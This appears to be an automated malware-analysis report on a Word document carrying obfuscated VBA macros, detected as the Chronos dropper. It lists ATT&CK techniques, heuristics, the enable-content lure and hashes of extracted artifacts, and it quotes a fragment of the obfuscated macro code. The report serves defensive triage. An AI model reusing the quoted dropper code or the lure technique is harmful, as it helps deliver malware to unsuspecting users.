MALICIOUS
Risk Score: 180
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is an OOXML document containing VBA macros, detected by ClamAV as Doc.Malware.Chronos-6897935-0. It employs a common lure, instructing the user to enable editing and content to view the document, which is a technique to bypass macro security. The VBA code is obfuscated but likely intended to download and execute a second-stage payload, as indicated by the presence of macro-related heuristics and the extracted artifact names.
Heuristics 7
-
ClamAV: Doc.Malware.Chronos-6897935-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
-
VBA project inside OOXML (medium, 2 related findings, OOXML_VBA): Document contains a VBA project — VBA macros present
-
Document_Open macro (low, OLE_VBA_DOCOPEN). Matched line in script:
`Private Sub Document_Open()`
-
Environ() call (env variable access) (low, OLE_VBA_ENVIRON). Matched line in script:
`IFjN9ulYESfIr = Environ(To0ZpEa9F(Chr(61) + Chr(21) + Chr(95) + Chr(194) + Chr(165) + Chr(133) + Chr(131), "QrvMIV7IaR")) & "\" & It8tuIaHe & To0ZpEa9F(Chr(209) + Chr(164) + Chr(144) + Chr(93), "NzARdlF585B")`
-
Macro/content-enable lure (medium, SE_ENABLE_LURE): Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 22035 bytes |

SHA-256: 26ae6ebf5832e2b0a54a02de5e960e81c0b96756344c97a2b89328919fc85fb5

Detection
ClamAV: No threats found
Obfuscation or payload: likely. 167 of 287 identifiers look randomly generated (e.g. 'BngRFHoWqEP9px4SLw2hpn0TPXV3') — consistent with name-mangling obfuscation.

Preview script: first 1,000 lines of the extracted script

| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 52736 bytes |

SHA-256: b86624341bcc8f22c3985fcb573d5e2401c20a17095278543ae9276c365b71dc

Detection
ClamAV: Doc.Malware.Chronos-6897935-0
Obfuscation or payload: unlikely